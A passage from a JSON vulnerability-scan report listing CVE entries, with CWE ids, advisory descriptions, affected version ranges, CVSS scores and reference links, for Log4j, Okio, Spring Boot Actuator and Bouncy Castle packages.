Exploit","url":"http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Dec/2"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Jul/11"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Mar/23"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/10/1"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/10/2"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/10/3"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/13/1"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/13/2"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/14/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/15/3"},{"summary":"Siemens Advisory ssa-397453","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"},{"summary":"Siemens Advisory ssa-479842","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"},{"summary":"Siemens Advisory ssa-661247","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"},{"summary":"Siemens Advisory ssa-714170","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"},{"summary":"GitHub Advisory GHSA-7rjr-3q55-vv33","url":"https://github.com/advisories/GHSA-7rjr-3q55-vv33"},{"summary":"Apache Advisory LOG4J2-3198","url":"https://issues.apache.org/jira/browse/LOG4J2-3198"},{"summary":"Apache Advisory LOG4J2-3201","url":"https://issues.apache.org/jira/browse/LOG4J2-3201"},{"summary":"Apache Advisory LOG4J2-3214","url":"https://issues.apache.org/jira/browse/LOG4J2-3214"},{"summary":"Apache Advisory LOG4J2-3221","url":"https://issues.apache.org/jira/browse/LOG4J2-3221"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM"},{"summary":"Apache Advisory changes-report","url":"https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0"},{"summary":"Apache Advisory lookups","url":"https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup"},{"summary":"Apache Advisory migration","url":"https://logging.apache.org/log4j/2.x/manual/migration.html"},{"summary":"Apache Advisory security","url":"https://logging.apache.org/log4j/2.x/security.html"},{"summary":"Microsoft Advisory microsofts-response-to-cve-2021-44228-apache-log4j2","url":"https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-44228"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-44228"},{"summary":"Sonicwall Advisory SNWLID-2021-0032","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"},{"summary":"NetApp Advisory ntap-20211210-0007","url":"https://security.netapp.com/advisory/ntap-20211210-0007"},{"summary":"Apple Advisory HT213189","url":"https://support.apple.com/kb/HT213189"},{"summary":"Cisco Advisory cisco-sa-apache-log4j-qRuKNEbd","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"},{"summary":"Twitter Advisory 1469345530182455296","url":"https://twitter.com/kurtseifried/status/1469345530182455296"},{"summary":"Bentley Advisory be-2022-0001","url":"https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001"},{"summary":"Debian Advisory dsa-5020","url":"https://www.debian.org/security/2021/dsa-5020"},{"summary":"Intel Advisory intel-sa-00646","url":"https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"},{"summary":"Cert Advisory 930724","url":"https://www.kb.cert.org/vuls/id/930724"},{"summary":"Nu11secur1ty Exploit","url":"https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"},{"summary":"Oracle Advisory alert-cve-2021-44228","url":"https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":10.0,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":10.0,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":10.0,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4|<2.12.2"]}],"title":"CVE-2021-44228/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-45105"]}],"cve":"CVE-2021-45105","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2021-12-18T18:00:07","ids":[{"system_name":"Cert Advisory","text":"930724"},{"system_name":"CVE Record","text":"CVE-2021-45105"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2021-0032"},{"system_name":"Cisco Advisory","text":"cisco-sa-apache-log4j-qRuKNEbd"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5024"},{"system_name":"NetApp Advisory","text":"ntap-20211218-0001"},{"system_name":"Apache Advisory","text":"security"},{"system_name":"Siemens Advisory","text":"ssa-479842"},{"system_name":"Siemens Advisory","text":"ssa-501673"}],"notes":[{"audience":"developers","category":"other","text":"Uncontrolled Recursion","title":"Additional CWE: 674"},{"category":"description","details":"Vulnerability Description","text":"Apache Log4j2 vulnerable to Improper Input Validation and Uncontrolled Recursion"},{"category":"details","details":"Vulnerability Details","text":"# Apache Log4j2 vulnerable to Improper Input Validation and Uncontrolled Recursion Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0 and 2.12.3.   # Affected packages Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4.0|<2.12.3"],"known_not_affected":["org.apache.logging.log4j/log4j-core@2.12.3"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/19/1"},{"summary":"Siemens Advisory ssa-479842","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"},{"summary":"Siemens Advisory ssa-501673","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/12/msg00017.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ"},{"summary":"Apache Advisory security","url":"https://logging.apache.org/log4j/2.x/security.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-45105"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-45105"},{"summary":"Sonicwall Advisory SNWLID-2021-0032","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"},{"summary":"NetApp Advisory ntap-20211218-0001","url":"https://security.netapp.com/advisory/ntap-20211218-0001"},{"summary":"Cisco Advisory cisco-sa-apache-log4j-qRuKNEbd","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"},{"summary":"Debian Advisory dsa-5024","url":"https://www.debian.org/security/2021/dsa-5024"},{"summary":"Cert Advisory 930724","url":"https://www.kb.cert.org/vuls/id/930724"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Zero Day Initiative Exploit","url":"https://www.zerodayinitiative.com/advisories/ZDI-21-1541"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.6,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":8.6,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":8.6,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4.0|<2.12.3"]}],"title":"CVE-2021-45105/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-9488"]}],"cve":"CVE-2020-9488","cwe":{"id":"295","name":"Improper Certificate Validation"},"discovery_date":"2020-06-05T14:15:51","ids":[{"system_name":"CVE Record","text":"CVE-2020-9488"},{"system_name":"Apache Advisory","text":"LOG4J2-2819"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"Debian Advisory","text":"dsa-5020"},{"system_name":"NetApp Advisory","text":"ntap-20200504-0003"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper validation of certificate with host mismatch in Apache Log4j SMTP appender"},{"category":"details","details":"Vulnerability Details","text":"# Improper validation of certificate with host mismatch in Apache Log4j SMTP appender Improper validation of certificate with host mismatch in Apache Log4j SMTP appender prior to version 2.13.2. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4.0|<2.12.3"],"known_not_affected":["org.apache.logging.log4j/log4j-core@2.12.3"]},"references":[{"summary":"Apache Advisory LOG4J2-2819","url":"https://issues.apache.org/jira/browse/LOG4J2-2819"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0a2699f724156a558afd1abb6c044fb9132caa66dce861b82699722a@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0df3d7a5acb98c57e64ab9266aa21eeee1d9b399addb96f9cf1cbe05@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1fc73f0e16ec2fa249d3ad39a5194afb9cc5afb4c023dc0bab5a5881@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r22a56beb76dd8cf18e24fda9072f1e05990f49d6439662d3782a392f@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2f209d271349bafd91537a558a279c08ebcff8fa3e547357d58833e6@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r33864a0fc171c1c4bf680645ebb6d4f8057899ab294a43e1e4fe9d04@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r393943de452406f0f6f4b3def9f8d3c071f96323c1f6ed1a098f7fe4@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3d1d00441c55144a4013adda74b051ae7864128ebcfb6ee9721a2eb3@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4285398e5585a0456d3d9db021a4fce6e6fcf3ec027dfa13a450ec98@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r45916179811a32cbaa500f972de9098e6ee80ee81c7f134fce83e03a@%3Cissues.flink.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r48bcd06049c1779ef709564544c3d8a32ae6ee5c3b7281a606ac4463@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r48efc7cb5aeb4e1f67aaa06fb4b5479a5635d12f07d0b93fc2d08809@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4d5dc9f3520071338d9ebc26f9f158a43ae28a91923d176b550a807b@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4db540cafc5d7232c62e076051ef661d37d345015b2e59b3f81a932f@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4ed1f49616a8603832d378cb9d13e7a8b9b27972bb46d946ccd8491f@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5a68258e5ab12532dc179edae3d6e87037fa3b50ab9d63a90c432507@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r65578f3761a89bc164e8964acd5d913b9f8fd997967b195a89a97ca3@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7641ee788e1eb1be4bb206a7d15f8a64ec6ef23e5ec6132d5a567695@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7e5c10534ed06bf805473ac85e8412fe3908a8fa4cabf5027bf11220@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7e739f2961753af95e2a3a637828fb88bfca68e5d6b0221d483a9ee5@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8c001b9a95c0bbec06f4457721edd94935a55932e64b82cc5582b846@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8e96c340004b7898cad3204ea51280ef6e4b553a684e1452bf1b18b1@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9776e71e3c67c5d13a91c1eba0dc025b48b802eb7561cc6956d6961c@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9a79175c393d14d760a0ae3731b4a873230a16ef321aa9ca48a810cd@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra051e07a0eea4943fa104247e69596f094951f51512d42c924e86c75@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra632b329b2ae2324fabbad5da204c4ec2e171ff60348ec4ba698fd40@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbc45eb0f53fd6242af3e666c2189464f848a851d408289840cecc6e3@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbc7642b9800249553f13457e46b813bea1aec99d2bc9106510e00ff3@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc2dbc4633a6eea1fcbce6831876cfa17b73759a98c65326d1896cb1a@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc6b81c013618d1de1b5d6b8c1088aaf87b4bacc10c2371f15a566701@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd55f65c6822ff235eda435d31488cfbb9aa7055cdf47481ebee777cc@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5d58088812cf8e677d99b07f73c654014c524c94e7fedbdee047604@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd8e87c4d69df335d0ba7d815b63be8bd8a6352f429765c52eb07ddac@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re024d86dffa72ad800f2848d0c77ed93f0b78ee808350b477a6ed987@%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rec34b1cccf907898e7cb36051ffac3ccf1ea89d0b261a2a3b3fb267f@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1c2a81a08034c688b8f15cf58a4cfab322d00002ca46d20133bee20@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/12/msg00017.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9488"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9488"},{"summary":"NetApp Advisory ntap-20200504-0003","url":"https://security.netapp.com/advisory/ntap-20200504-0003"},{"summary":"Debian Advisory dsa-5020","url":"https://www.debian.org/security/2021/dsa-5020"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":3.7,"baseSeverity":"LOW","confidentialityImpact":"LOW","environmentalScore":3.7,"environmentalSeverity":"LOW","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":3.7,"temporalSeverity":"LOW","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4.0|<2.12.3"]}],"title":"CVE-2020-9488/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-3635"]}],"cve":"CVE-2023-3635","cwe":{"id":"195","name":"Signed to Unsigned Conversion Error"},"discovery_date":"2023-07-12T21:30:50","ids":[{"system_name":"CVE Record","text":"CVE-2023-3635"},{"system_name":"JFrog Advisory","text":"okio-gzip-source-unhandled-exception-dos-xray-523195"}],"notes":[{"audience":"developers","category":"other","text":"Incorrect Conversion between Numeric Types","title":"Additional CWE: 681"},{"category":"description","details":"Vulnerability Description","text":"Okio Signed to Unsigned Conversion Error vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Okio Signed to Unsigned Conversion Error vulnerability GzipSource does not handle an exception that might be raised when parsing a malformed gzip buffer. This may lead to denial of service of the Okio client when handling a crafted GZIP archive, by using the GzipSource class."}],"product_status":{"known_affected":["com.squareup.okio/okio@vers:maven/>=0.5.0|<=1.17.5"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-3635"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-3635"},{"summary":"JFrog Advisory okio-gzip-source-unhandled-exception-dos-xray-523195","url":"https://research.jfrog.com/vulnerabilities/okio-gzip-source-unhandled-exception-dos-xray-523195"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":5.9,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.9,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.9,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.squareup.okio/okio@vers:maven/>=0.5.0|<=1.17.5"]}],"title":"CVE-2023-3635/pkg:maven/com.squareup.okio/okio@1.6.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-34055"]}],"cve":"CVE-2023-34055","discovery_date":"2023-11-28T09:30:27","ids":[{"system_name":"CVE Record","text":"CVE-2023-34055"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-6226862"},{"system_name":"NetApp Advisory","text":"ntap-20231221-0010"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Spring Boot Actuator denial of service vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Spring Boot Actuator denial of service vulnerability In Spring Boot versions 2.7.0 - 2.7.17, 3.0.0-3.0.12 and 3.1.0-3.1.5, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition.  Specifically, an application is vulnerable when all of the following are true:   * the application uses Spring MVC or Spring WebFlux  * `org.springframework.boot:spring-boot-actuator` is on the classpath"}],"product_status":{"known_affected":["org.springframework.boot/spring-boot-actuator@vers:maven/>=1.0.0.RELEASE|<=2.7.9"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34055"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34055"},{"summary":"NetApp Advisory ntap-20231221-0010","url":"https://security.netapp.com/advisory/ntap-20231221-0010"},{"summary":"Snyk Advisory SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-6226862","url":"https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-6226862"},{"summary":"Cve 2023","url":"https://spring.io/security/cve-2023-34055"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"LOW","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"LOW","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","version":"3.1"},"products":["org.springframework.boot/spring-boot-actuator@vers:maven/>=1.0.0.RELEASE|<=2.7.9"]}],"title":"CVE-2023-34055/pkg:maven/org.springframework.boot/spring-boot-actuator@1.5.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-15522"]}],"cve":"CVE-2020-15522","cwe":{"id":"203","name":"Observable Discrepancy"},"discovery_date":"2021-08-13T15:22:31","ids":[{"system_name":"CVE Record","text":"CVE-2020-15522"},{"system_name":"NetApp Advisory","text":"ntap-20210622-0007"}],"notes":[{"audience":"developers","category":"other","text":"Concurrent Execution using Shared Resource with Improper Synchronization","title":"Additional CWE: 362"},{"category":"description","details":"Vulnerability Description","text":"Timing based private key exposure in Bouncy Castle"},{"category":"details","details":"Vulnerability Details","text":"# Timing based private key exposure in Bouncy Castle Bouncy Castle BC Java before 1.66, BC C# .NET before 1.8.7, BC-FJA before 1.0.2.1, BC before 1.66, BC-FNA before 1.0.1.1 have a timing issue within the EC math library that can expose information about the private key when an attacker is able to observe timing information for the generation of multiple deterministic ECDSA signatures."}],"product_status":{"known_affected":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.65.01"],"known_not_affected":["org.bouncycastle/bcprov-jdk15on@1.66"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15522"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15522"},{"summary":"NetApp Advisory ntap-20210622-0007","url":"https://security.netapp.com/advisory/ntap-20210622-0007"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":5.1,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.1,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.1,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.65.01"]}],"title":"CVE-2020-15522/pkg:maven/org.bouncycastle/bcprov-jdk15on@1.55?